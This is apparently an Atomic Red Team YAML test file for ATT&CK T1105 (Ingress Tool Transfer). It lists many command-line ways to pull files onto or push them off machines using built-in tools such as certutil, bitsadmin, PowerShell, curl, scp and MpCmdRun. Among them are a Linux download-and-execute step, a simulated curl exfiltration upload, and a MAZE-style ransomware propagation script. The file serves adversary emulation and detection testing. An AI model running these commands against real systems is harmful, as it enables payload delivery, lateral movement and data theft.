attack_technique: T1105 display_name: Ingress Tool Transfer atomic_tests: - name: rsync remote file copy (push) auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 description: | Utilize rsync to perform a remote file copy (push) supported_platforms: - linux - macos input_arguments: remote_path: description: Remote path to receive rsync type: path default: /tmp/victim-files remote_host: description: Remote host to copy toward type: string default: victim-host local_path: description: Path of folder to copy type: path default: /tmp/adversary-rsync/ username: description: User account to authenticate on remote host type: string default: victim dependency_executor_name: sh dependencies: - description: | rsync must be installed on the machine prereq_command: | if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi get_prereq_command: | (pkg install -y rsync)||(sudo apt-get -y install rsync) executor: command: | rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} name: sh elevation_required: true - name: rsync remote file copy (pull) auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f description: | Utilize rsync to perform a remote file copy (pull) supported_platforms: - linux - macos input_arguments: remote_path: description: Path of folder to copy type: path default: /tmp/adversary-rsync/ remote_host: description: Remote host to copy from type: string default: adversary-host local_path: description: Local path to receive rsync type: path default: /tmp/victim-files username: description: User account to authenticate on remote host type: string default: adversary dependency_executor_name: sh dependencies: - description: | rsync must be installed on the machine prereq_command: | if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi get_prereq_command: | (pkg install -y rsync)||(sudo apt-get -y install rsync) executor: command: | rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} name: sh - name: scp remote file copy (push) auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 description: | Utilize scp to perform a remote file copy (push) supported_platforms: - linux - macos input_arguments: remote_path: description: Remote path to receive scp type: path default: /tmp/victim-files/ local_file: description: Path of file to copy type: path default: /tmp/adversary-scp remote_host: description: Remote host to copy toward type: string default: victim-host username: description: User account to authenticate on remote host type: string default: victim executor: command: | scp #{local_file} #{username}@#{remote_host}:#{remote_path} name: sh - name: scp remote file copy (pull) auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 description: | Utilize scp to perform a remote file copy (pull) supported_platforms: - linux - macos input_arguments: remote_host: description: Remote host to copy from type: string default: adversary-host local_path: description: Local path to receive scp type: path default: /tmp/victim-files/ remote_file: description: Path of file to copy type: path default: /tmp/adversary-scp username: description: User account to authenticate on remote host type: string default: adversary executor: command: | scp #{username}@#{remote_host}:#{remote_file} #{local_path} name: sh - name: sftp remote file copy (push) auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e description: | Utilize sftp to perform a remote file copy (push) supported_platforms: - linux - macos input_arguments: remote_path: description: Remote path to receive sftp type: path default: /tmp/victim-files/ local_file: description: Path of file to copy type: path default: /tmp/adversary-sftp remote_host: description: Remote host to copy toward type: string default: victim-host username: description: User account to authenticate on remote host type: string default: victim executor: command: | sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}' name: bash - name: sftp remote file copy (pull) auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef description: | Utilize sftp to perform a remote file copy (pull) supported_platforms: - linux - macos input_arguments: remote_host: description: Remote host to copy from type: string default: adversary-host local_path: description: Local path to receive sftp type: path default: /tmp/victim-files/ remote_file: description: Path of file to copy type: path default: /tmp/adversary-sftp username: description: User account to authenticate on remote host type: string default: adversary executor: command: | sftp #{username}@#{remote_host}:#{remote_file} #{local_path} name: sh - name: certutil download (urlcache) auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 description: | Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! supported_platforms: - windows input_arguments: remote_file: description: URL of file to copy type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path to place file type: path default: Atomic-license.txt executor: command: | cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} cleanup_command: | del #{local_path} >nul 2>&1 name: command_prompt - name: certutil download (verifyctl) auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b description: | Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! supported_platforms: - windows input_arguments: remote_file: description: URL of file to copy type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path to place file type: path default: Atomic-license.txt executor: command: | $datePath = "certutil-$(Get-Date -format yyyy_MM_dd)" New-Item -Path $datePath -ItemType Directory Set-Location $datePath certutil -verifyctl -split -f #{remote_file} Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} } cleanup_command: | Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore name: powershell - name: Windows - BITSAdmin BITS Download auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b description: | This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads. supported_platforms: - windows input_arguments: bits_job_name: description: Name of the created BITS job type: string default: qcxjb7 local_path: description: Local path to place file type: path default: '%temp%\Atomic-license.txt' remote_file: description: URL of file to copy type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt executor: command: | C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} name: command_prompt - name: Windows - PowerShell Download auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 description: | This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families. supported_platforms: - windows input_arguments: remote_file: description: URL of file to copy type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt destination_path: description: Destination path to file type: path default: $env:TEMP\Atomic-license.txt executor: command: | (New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") cleanup_command: | Remove-Item #{destination_path} -Force -ErrorAction Ignore name: powershell - name: OSTAP Worming Activity auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad description: | OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. supported_platforms: - windows input_arguments: destination_path: description: Path to create remote file at. Default is local admin share. type: string default: '\\localhost\C$' executor: command: | pushd #{destination_path} echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js CScript.exe AtomicTestT1105.js //E:JScript del AtomicTestT1105.js /Q >nul 2>&1 del AtomicTestFileT1105.js /Q >nul 2>&1 popd name: command_prompt elevation_required: true - name: svchost writing a file to a UNC path auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f description: | svchost.exe writing a non-Microsoft Office file to a file with a UNC path. Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file. supported_platforms: - windows executor: command: | copy C:\Windows\System32\cmd.exe C:\svchost.exe C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt cleanup_command: | del C:\T1105.txt >nul 2>&1 del C:\\svchost.exe >nul 2>&1 name: command_prompt elevation_required: true - name: Download a File with Windows Defender MpCmdRun.exe auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc description: | Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory. More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ supported_platforms: - windows input_arguments: remote_file: description: URL of file to download type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Location to save downloaded file type: path default: '%temp%\Atomic-license.txt' dependencies: - description: 'Must have a Windows Defender version with MpCmdRun.exe installed' prereq_command: | cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*" MpCmdRun.exe /? >nul 2>&1 get_prereq_command: Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually" executor: command: | cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*" MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path} cleanup_command: |- del #{local_path} >nul 2>&1 del %temp%\MpCmdRun.log >nul 2>&1 name: command_prompt - name: whois file download auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: | Download a remote file using the whois utility supported_platforms: - linux - macos input_arguments: remote_host: description: Remote hostname or IP address type: string default: localhost remote_port: description: Remote port to connect to type: integer default: 8443 output_file: description: Path of file to save output to type: path default: /tmp/T1105.whois.out query: description: Query to send to remote server type: string default: "Hello from Atomic Red Team test T1105" timeout: description: Timeout period before ending process (seconds) type: integer default: 1 dependencies: - description: | The whois and timeout commands must be present prereq_command: | which whois && which timeout get_prereq_command: | echo "Please install timeout and the whois package" executor: name: sh elevation_required: false command: | timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} cleanup_command: | rm -f #{output_file} - name: File Download via PowerShell auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 description: | Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. supported_platforms: - windows input_arguments: target_remote_file: description: File to download type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt output_file: description: File to write to type: string default: LICENSE.txt executor: command: | (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} name: powershell - name: File download with finger.exe on Windows auto_generated_guid: 5f507e45-8411-4f99-84e7-e38530c45d01 description: | Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server. Because this is being tested on the localhost, you should not be expecting a successful connection https://www.exploit-db.com/exploits/48815 https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/ supported_platforms: - windows input_arguments: remote_host: description: Remote hostname or IP address type: string default: localhost executor: name: command_prompt command: | finger base64_filedata@#{remote_host} - name: Download a file with IMEWDBLD.exe auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2 description: | Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]." or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1].. Run "Get-ChildItem -Path C:\Users\\AppData\Local\Microsoft\Windows\INetCache\ -Include * -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file. supported_platforms: - windows input_arguments: remote_url: description: Location of file to be downloaded. type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml file_name: description: Name of the file to be downloaded without extension. type: string default: T1105 executor: command: | $imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe" & $imewdbled #{remote_url} cleanup_command: | $inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\" $file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue) if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore } name: powershell - name: Curl Download File auto_generated_guid: 2b080b99-0deb-4d51-af0f-833d37c4ca6a description: | The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior. Expected output will include whether the file downloaded successfully or not. supported_platforms: - windows input_arguments: file_download: description: File to download type: string default: https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll curl_path: description: path to curl.exe type: path default: C:\Windows\System32\Curl.exe dependency_executor_name: powershell dependencies: - description: | Curl must be installed on system. prereq_command: | if (Test-Path #{curl_path}) {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl" Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl" Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" executor: command: | #{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll #{curl_path} -k #{file_download} --output c:\users\public\music\allthethingsx64.dll #{curl_path} -k #{file_download} -o c:\programdata\allthethingsx64.dll #{curl_path} -k #{file_download} -o %Temp%\allthethingsx64.dll cleanup_command: | del c:\users\public\music\allthethingsx64.dll >nul 2>&1 del c:\users\public\music\allthethingsx64.dll >nul 2>&1 del c:\programdata\allthethingsx64.dll >nul 2>&1 del %Temp%\allthethingsx64.dll >nul 2>&1 name: command_prompt - name: Curl Upload File auto_generated_guid: 635c9a38-6cbf-47dc-8615-3810bc1167cf description: | The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration Expected output will include whether the file uploaded successfully or not. supported_platforms: - windows input_arguments: curl_path: description: path to curl.exe type: path default: C:\Windows\System32\Curl.exe remote_destination: description: Remote destination type: string default: www.example.com file_path: description: File to upload type: string default: c:\temp\atomictestfile.txt dependency_executor_name: powershell dependencies: - description: | Curl must be installed on system. prereq_command: | if (Test-Path #{curl_path}) {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl" Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl" Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" - description: | A file must be created to upload prereq_command: | if (Test-Path #{file_path}) {exit 0} else {exit 1} get_prereq_command: | echo "This is an Atomic Test File" > #{file_path} executor: command: | #{curl_path} -T #{file_path} #{remote_destination} #{curl_path} --upload-file #{file_path} #{remote_destination} #{curl_path} -d #{file_path} #{remote_destination} #{curl_path} --data #{file_path} #{remote_destination} name: command_prompt - name: Download a file with Microsoft Connection Manager Auto-Download auto_generated_guid: d239772b-88e2-4a2e-8473-897503401bcc description: | Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file. The issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN Servers profile is avoided by setting a temporary TMP folder and denying the delete permission to all files for the user. Upon successful execution the test will open calculator and Notepad executable for 10 seconds. reference: https://twitter.com/ElliotKillick/status/1455897435063074824 https://github.com/LOLBAS-Project/LOLBAS/pull/151 https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/ https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html supported_platforms: - windows input_arguments: Path_to_file: description: Path to the Batch script type: path default: PathToAtomicsFolder\T1105\src\T1105.bat dependency_executor_name: powershell dependencies: - description: | #{Path_to_file} must exist on system. prereq_command: | if (Test-Path "#{Path_to_file}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{Path_to_file}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat" -OutFile "#{Path_to_file}" executor: command: | "#{Path_to_file}" 1>NUL cleanup_command: | del /f/s/q %temp%\T1105 >nul 2>&1 rmdir /s/q %temp%\T1105 >nul 2>&1 name: command_prompt - name: MAZE Propagation Script auto_generated_guid: 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf description: | This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one. Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location. Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html supported_platforms: - windows input_arguments: binary_file: description: Binary file to copy to remote machines type: string default: $env:comspec exe_remote_folder: description: Path to store executable on remote machine (no drive letter) type: string default: \Windows\Temp\T1105.exe remote_drive_letter: description: Remote drive letter type: string default: C dependency_executor_name: powershell dependencies: - description: | Binary file must exist at specified location (#{binary_file}) prereq_command: | if (Test-Path #{binary_file}) {exit 0} else {exit 1} get_prereq_command: | write-host "The binary_file input parameter must be set to a binary that exists on this computer." - description: | Machine list must exist at specified location ("PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line." executor: command: | $machine_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" $offline_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" $completed_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" foreach ($machine in get-content -path "$machine_list") {if (test-connection -Count 1 -computername $machine -quiet) {cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" echo $machine >> "$completed_list" wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"} else {echo $machine >> "$offline_list"}} cleanup_command: | if (test-path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt") {foreach ($machine in get-content -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt") {wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}} Remove-Item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue Remove-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue name: powershell - name: Printer Migration Command-Line Tool UNC share folder into a zip file auto_generated_guid: 49845fc1-7961-4590-a0f0-3dbcf065ae7e description: | Create a ZIP file from a folder in a remote drive supported_platforms: - windows input_arguments: Path_unc: description: Path to the UNC folder type: path default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\ Path_PrintBrm: description: Path to PrintBrm.exe type: path default: C:\Windows\System32\spool\tools\PrintBrm.exe executor: command: | del %TEMP%\PrintBrm.zip >nul 2>&1 #{Path_PrintBrm} -b -d #{Path_unc} -f %TEMP%\PrintBrm.zip -O FORCE cleanup_command: | del %TEMP%\PrintBrm.zip >nul 2>&1 name: command_prompt - name: Lolbas replace.exe use to copy file auto_generated_guid: 54782d65-12f0-47a5-b4c1-b70ee23de6df description: | Copy file.cab to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/ supported_platforms: - windows input_arguments: replace_cab: description: Path to the cab file type: path default: PathToAtomicsFolder\T1105\src\redcanary.cab Path_replace: description: Path to replace.exe type: path default: C:\Windows\System32\replace.exe dependency_executor_name: powershell dependencies: - description: | #{replace_cab} must exist on system. prereq_command: | if (Test-Path "#{replace_cab}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{replace_cab}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab" -OutFile "#{replace_cab}" executor: command: | del %TEMP%\redcanary.cab >nul 2>&1 #{Path_replace} "#{replace_cab}" %TEMP% /A cleanup_command: | del %TEMP%\redcanary.cab >nul 2>&1 name: command_prompt - name: Lolbas replace.exe use to copy UNC file auto_generated_guid: ed0335ac-0354-400c-8148-f6151d20035a description: | Copy UNC file to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/ supported_platforms: - windows input_arguments: replace_cab: description: UNC Path to the cab file type: path default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab Path_replace: description: Path to replace.exe type: path default: C:\Windows\System32\replace.exe executor: command: | del %TEMP%\redcanary.cab >nul 2>&1 #{Path_replace} #{replace_cab} %TEMP% /A cleanup_command: | del %TEMP%\redcanary.cab >nul 2>&1 name: command_prompt - name: certreq download auto_generated_guid: 6fdaae87-c05b-42f8-842e-991a74e8376b description: Use certreq to download a file from the web supported_platforms: - windows input_arguments: local_path: description: Local path to place file type: string default: '%temp%\Atomic-license.txt' remote_file: description: URL of file to copy type: url default: https://example.com executor: command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}' cleanup_command: 'del #{local_path} >nul 2>&1' name: command_prompt - name: Download a file using wscript auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188 description: Use wscript to run a local VisualBasic file to download a remote file supported_platforms: - windows input_arguments: vbscript_file: description: Full path to the VisualBasic downloading the file type: string default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs dependency_executor_name: powershell dependencies: - description: | #{vbscript_file} must be exist on system. prereq_command: | if (Test-Path "#{vbscript_file}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{vbscript_file}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs" -OutFile "#{vbscript_file}" executor: command: | wscript.exe "#{vbscript_file}" cleanup_command: del Atomic-License.txt >nul 2>&1 name: command_prompt - name: Linux Download File and Run auto_generated_guid: bdc373c5-e9cf-4563-8a7b-a9ba720a90f3 description: | Utilize linux Curl to download a remote file, chmod +x it and run it. supported_platforms: - linux input_arguments: remote_url: description: url of remote payload type: string default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh payload_name: description: payload name type: string default: atomic.sh executor: command: | curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name} cleanup_command: | rm #{payload_name} name: sh - name: Nimgrab - Transfer Files auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e description: | Use nimgrab.exe to download a file from the web. supported_platforms: - windows input_arguments: remote_file: description: URL of file to copy type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt destination_path: description: Destination path to file type: path default: $env:TEMP\Atomic-license.txt executor: command: | cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path} cleanup_command: | del #{destination_path} >nul 2>&1 name: command_prompt dependency_executor_name: powershell dependencies: - description: | NimGrab must be installed on system. prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\nim.zip" Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\nim.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\nim" -Force Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe" "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" - name: iwr or Invoke Web-Request download auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279 description: | Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions. supported_platforms: - windows input_arguments: remote_file: description: URL of file to copy type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path to place file type: path default: '%temp%\Atomic-license.txt' executor: command: | powershell.exe iwr -URI #{remote_file} -Outfile #{local_path} cleanup_command: | del %temp%\Atomic-license.txt >nul 2>&1 name: command_prompt elevation_required: true - name: Arbitrary file download using the Notepad++ GUP.exe binary auto_generated_guid: 66ee226e-64cb-4dae-80e3-5bf5763e4a51 description: |- GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files(.zip) from internet/github. [Reference](https://x.com/nas_bench/status/1535322182863179776?s=20) Upon execution, a sample zip file will be downloaded to C:\Temp\Sample folder supported_platforms: - windows input_arguments: target_file_url: description: 'URL of the target ZIP file (Eg: https://example.com/test.zip)' type: url default: https://getsamplefiles.com/download/zip/sample-2.zip working_dir: description: The directory where GUP.exe & it's dependecies exists type: path default: PathToAtomicsFolder\T1105\bin\ gup_executable: description: GUP is an open source signed binary used by Notepad++ for software updates type: String default: PathToAtomicsFolder\T1105\bin\GUP.exe target_file_sha256: description: SHA256 value of target ZIP file type: string default: CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6 dependency_executor_name: powershell dependencies: - description: Gup.exe binary must exist on disk at specified location (#{gup_executable}) prereq_command: if (Test-Path "#{gup_executable}") {exit 0} else {exit 1} get_prereq_command: |- New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/bin/GUP.exe" -OutFile "#{gup_executable}" executor: command: |- mkdir "c:\Temp" cd #{working_dir} GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}" cleanup_command: rmdir /s /q "C:\Temp\Sample" >nul 2>nul name: command_prompt elevation_required: true - name: File download via nscurl auto_generated_guid: 5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c description: | Use nscurl to download and write a file/payload from the internet. -k = Disable certificate checking -o = Output destination supported_platforms: - macos input_arguments: remote_file: description: URL of remote file to download type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt destination_path: description: Local path to place remote file type: path default: license.txt executor: command: nscurl -k "#{remote_file}" -o "#{destination_path}" cleanup_command: rm "#{destination_path}" name: sh elevation_required: false - name: File Download with Sqlcmd.exe auto_generated_guid: 6934c16e-0b3a-4e7f-ab8c-c414acd32181 description: |- One of the windows packages 'Sqlcmd.exe' can be abused to download malicious files from C2 servers This Atomic will exhibit the similar behavior by downloading a sample zip file from src directory of this Technique folder via GitHub URL supported_platforms: - windows input_arguments: remote_url: description: URL of the C2 Server from where file/s need to be downloaded type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip local_file_path: description: The local file path along with filename to where the file needs to be downloaded and placed. type: path default: C:\T1105.zip dependency_executor_name: powershell dependencies: - description: Windows package 'Sqlcmd' need to be available in the machine to execute this atomic successfully prereq_command: if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1} get_prereq_command: winget install Microsoft.Sqlcmd --silent 2>$null | Out-Null executor: command: 'sqlcmd -i #{remote_url} -o #{local_file_path}' cleanup_command: rm "#{local_file_path}" 2>$null | Out-Null name: powershell elevation_required: true - name: Remote File Copy using PSCP auto_generated_guid: c82b1e60-c549-406f-9b00-0a8ae31c9cfe description: | Copy a staged file using PSCP.exe to a public target location. supported_platforms: - windows input_arguments: pscp_url: description: pscp.exe download path type: string default: https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe pscp_binary: description: PSCP binary location type: string default: 'PathToAtomicsFolder\..\ExternalPayloads\pscp.exe' scp_user: description: Username of the SCP user type: string default: 'atomic' scp_password: description: Password for the SCP User type: string default: 'atomic' scp_port: description: port for the remote server type: string default: '22' exfil_package: description: path to exfil package type: path default: 'C:\Temp\T1105_scp.zip' target_location: description: Remote location where the data will be copied to. type: string default: 127.0.0.1 target_filename: description: Filename on the destination. type: string default: T1105_scp.zip dependency_executor_name: powershell dependencies: - description: | pscp.exe must be available on the system. prereq_command: | if (Test-Path #{pscp_binary}) {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "#{pscp_url}" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe" executor: command: | fsutil file createnew C:\Temp\T1105_scp.zip 1048576 echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename} cleanup_command: | del /f /q #{exfil_package} name: command_prompt elevation_required: false - name: Windows push file using scp.exe auto_generated_guid: 2a4b0d29-e5dd-4b66-b729-07423ba1cd9d description: | This test simulates pushing files using SCP on a Windows environment. supported_platforms: - windows input_arguments: remote_path: description: Path of folder to copy type: path default: /tmp/ remote_host: description: Remote host to send type: string default: adversary-host local_path: description: Local path to copy from type: path default: C:\temp file_name: description: Name of the file to transfer type: string default: T1105.txt username: description: User account to authenticate on remote host type: string default: adversary dependency_executor_name: powershell dependencies: - description: | This test requires the `scp` command to be available on the system. prereq_command: | if (Get-Command scp -ErrorAction SilentlyContinue) { Write-Output "SCP command is available." exit 0 } else { Write-Output "SCP command is not available." exit 1 } get_prereq_command: | # Define the capability name for OpenSSH Client $capabilityName = 